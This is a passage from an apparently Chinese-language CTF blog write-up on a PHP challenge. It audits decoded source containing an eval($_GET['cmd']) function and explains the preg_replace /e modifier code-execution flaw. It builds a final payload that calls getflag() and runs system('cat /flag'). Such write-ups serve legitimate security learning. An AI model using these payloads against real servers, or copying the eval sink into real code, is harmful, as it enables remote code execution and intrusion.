class="hljs-symbol">N0</span>cikuICJcbiI<span class="hljs-number">7</span>C<span class="hljs-symbol">n0</span>KCmZ<span class="hljs-number">1</span>bm<span class="hljs-symbol">N0</span>aW<span class="hljs-number">9</span>uIGdldEZsYWcoKXsKCUBldmFsKCRfR<span class="hljs-number">0</span>VUWydjbWQ<span class="hljs-symbol">nXSk7</span>C<span class="hljs-symbol">n0</span>K<br></code></pre></td></tr></table></figure>

<p>然后我们将其解码之后就是这样</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$id</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>];<br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;id&#x27;</span>] = <span class="hljs-variable">$id</span>;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">complex</span>(<span class="hljs-params"><span class="hljs-variable">$re</span>, <span class="hljs-variable">$str</span></span>) </span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">preg_replace</span>(<br>        <span class="hljs-string">&#x27;/(&#x27;</span> . <span class="hljs-variable">$re</span> . <span class="hljs-string">&#x27;)/ei&#x27;</span>,<br>        <span class="hljs-string">&#x27;strtolower(&quot;\\1&quot;)&#x27;</span>,<br>        <span class="hljs-variable">$str</span><br>    );<br>&#125;<br><br><br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$_GET</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$re</span> =&gt; <span class="hljs-variable">$str</span>) &#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">complex</span>(<span class="hljs-variable">$re</span>, <span class="hljs-variable">$str</span>). <span class="hljs-string">&quot;\n&quot;</span>;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getFlag</span>(<span class="hljs-params"></span>)</span>&#123;<br>	@<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p>3、代码审计</p>
<p>这里很明显要去利用getFlag函数去命令执行拿到flag，要使用该函数只能利用echo complex($re,$str)这条语句</p>
<p>这里解题的关键就是<code>preg_replace()+/e</code>存在代码执行漏洞</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">preg_replace</span> (正则表达式, 替换成什么, 目标字符串, 最大替换次数【默认-<span class="hljs-number">1</span>，无数次】, 替换次数)<br></code></pre></td></tr></table></figure>

<p>意思就是就是把（目标字符串） 根据（正则表达的要求） 替换成什么</p>
<p>在此之前说明一些东西</p>
<hr>
<p><strong>双引号：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;<span class="hljs-subst">&#123;$&#123;phpinfo()&#125;</span>&#125;&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>能成功执行phpinfo()函数并回显</p>
<p><strong>单引号：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&#123;$&#123;phpinfo()&#125;&#125;&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>无法执行，没有回显</p>
<p><strong>这是因为双引号里面如果包含有变量，php解释器会将其替换为变量解释后的结果；单引号中的变量不会被处理。</strong></p>
<p><strong>注意：双引号中的函数不会被执行和替换</strong></p>
<hr>
<p>再看一个例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/(.*)/ei&#x27;</span>, <span class="hljs-string">&#x27;strtolower(&quot;\\1&quot;)&#x27;</span>, $&#123;<span class="hljs-title function_ invoke__">phpinfo</span>()&#125;);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>成功执行phpinfo()函数。</p>
<h2 id="原理："><a href="#原理：" class="headerlink" title="原理："></a>原理：</h2><p><strong>反向引用</strong><br><strong>对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中，</strong><br><strong>所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。</strong><br><strong>缓冲区编号从 1 开始，最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问，</strong><br><strong>其中 n 为一个标识特定缓冲区的一位或两位十进制数。</strong></p>
<hr>
<p><strong>\1 实际上指定的是第一个子匹配项。而这段代码里面的第一个子匹配项就是${phpinfo()}。这样我们就执行了phpinfo。</strong></p>
<p><strong>&#x2F;e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码（在适当的逆向引用替换完之后）</strong></p>
<p><strong>因此可以通过preg_replace 的 &#x2F;e 修正符会将 replacement 参数当作 php 代码，并且以 eval 函数的方式执行</strong></p>
<p><strong>其中在正则表达式中，&#x2F;(.*)&#x2F;ei 是一个匹配任意字符（.）零次或多次（*），并将匹配的内容放入一个捕获组中的正则表达式。</strong></p>
<p>这里的&#x2F;e修饰符会将preg_replace中的replacement即<code>strtolower(&quot;\\1&quot;)</code>当做PHP代码，参数则是引用匹配到的字符串。</p>
<p>再实验一下。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$_GET</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$re</span> =&gt; <span class="hljs-variable">$str</span>) &#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">complex</span>(<span class="hljs-variable">$re</span>, <span class="hljs-variable">$str</span>). <span class="hljs-string">&quot;\n&quot;</span>;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getFlag</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;1&#x27;</span>;<br>&#125;<br><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">strtolower</span>(<span class="hljs-string">&quot;$&#123;getFlag()&#125;&quot;</span>);<br></code></pre></td></tr></table></figure>

<p>成功输出1，说明getFlag函数成功执行。</p>
<p>所以我们构造payload：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?.</span>*=<span class="hljs-variable">$&#123;</span>getflag()&#125;&amp;cmd=system(<span class="hljs-string">&#x27;cat /flag&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>发现没有看到flag。</p>
<p>这是因为.是非法传参，会被转为下划线_，所以我们可以把<code>.*</code>换成<code>\S*</code>表示匹配所有的非空白字符</p>
<p>最终payload：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-keyword">next</span>.php?\S*=<span class="hljs-variable">$&#123;getflag()&#125;</span>&amp;cmd=system(<span class="hljs-string">&#x27;cat /flag&#x27;</span>);<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="知识点："><a href="#知识点：" class="headerlink" title="知识点："></a>知识点：</h2><p>这题主要涉及到这几个知识点</p>
<h3 id="phpinfo"><a href="#phpinfo" class="headerlink" title="${phpinfo()}"></a>${phpinfo()}</h3><p>在双引号下的”${phpinfo()}”，这里phpinfo()换成其他函数都行，这里的{phpinfo()}就成了一个变量</p>
<p>双引号里面如果包含有变量，php解释器会将其替换为变量解释后的结果；单引号中的变量不会被处理。</p>
<p>所以这样就能成功执行其中的函数。</p>
<p>例如</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> strtolower(<span class="hljs-string">&quot;<span class="hljs-variable">$&#123;getFlag()&#125;</span>&quot;</span>);<br></code></pre></td></tr></table></figure>

<hr>
<h3 id="preg-replace、-e"><a href="#preg-replace、-e" class="headerlink" title="preg_replace、&#x2F;e"></a>preg_replace、&#x2F;e</h3><p>preg_replace语法：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">preg_replace</span><span class="hljs-params">(<span class="hljs-variable">$pattren</span>,replacement,<span class="hljs-variable">$string</span>)</span></span><br></code></pre></td></tr></table></figure>

<p>如果pattren正则匹配后加了&#x2F;e后缀，就会将 replacement 参数当作 php 代码，并且以 eval 函数的方式执行</p>
<hr>
<h3 id="反向引用"><a href="#反向引用" class="headerlink" title="反向引用"></a>反向引用</h3><p>在正则中\1 实际上指定的是第一个子匹配项。</p>
<p>比如</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">preg_replace(<span class="hljs-string">&#x27;/(.*)/ei&#x27;</span>, <span class="hljs-string">&#x27;strtolower(&quot;\\1&quot;)&#x27;</span>, <span class="hljs-variable">$&#123;phpinfo()&#125;</span>);<br></code></pre></td></tr></table></figure>

<p>这段代码里面的第一个子匹配项就是${phpinfo()}。因为<code>.*</code>是匹配任意字符（<code>.</code>）零次或多次（<code>*</code>）</p>
<p>这样我们就执行了phpinfo。</p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。 </span>
    </div>
</article>





    <div id="comments">
    <script>
        {
            const comments = document.getElementById("comments");
            const script = document.createElement("script");
            script.src = "https://giscus.app/client.js";
            script.setAttribute('data-repo', "MIXBP/MIXBP.github.io");
            script.setAttribute('data-repo-id', "R_kgDONYaZsg");
            script.setAttribute('data-category', "Announcements");
            script.setAttribute('data-category-id', "DIC_kwDONYaZss4ClAnT");
            script.setAttribute('data-mapping', "pathname");
            script.setAttribute('data-strict', "0");
            script.setAttribute('data-reactions-enabled', "1");
            script.setAttribute('data-emit-metadata', "0");
            script.setAttribute('data-input-position', "top");
            script.setAttribute('data-theme', "noborder_dark");
            script.setAttribute('data-lang', "zh-CN");
            script.setAttribute('data-loading', "lazy");
            script.setAttribute('crossorigin', "anonymous");
            script.setAttribute('async', "");
            comments.appendChild(script);
        }
    </script>
</div>



    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©MIXBP 2024
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="Toggle full screen shortcut key s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    #post {
        background: url(/img/background.jpg);
    }
    
    
    #post .index {
        background: url(/img/background2.jpg);
    }
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("/img/bjtp.jpg");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>






<div class="mobile-menus-out" >

</div>
<div class="mobile-menus">
    
    
    
    <a class="dynamic-menu " target="_self"   href="https://mixbp.github.io/">MIXBP</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="https://mixbp.github.io/">github</a>
    
</div>


</html>
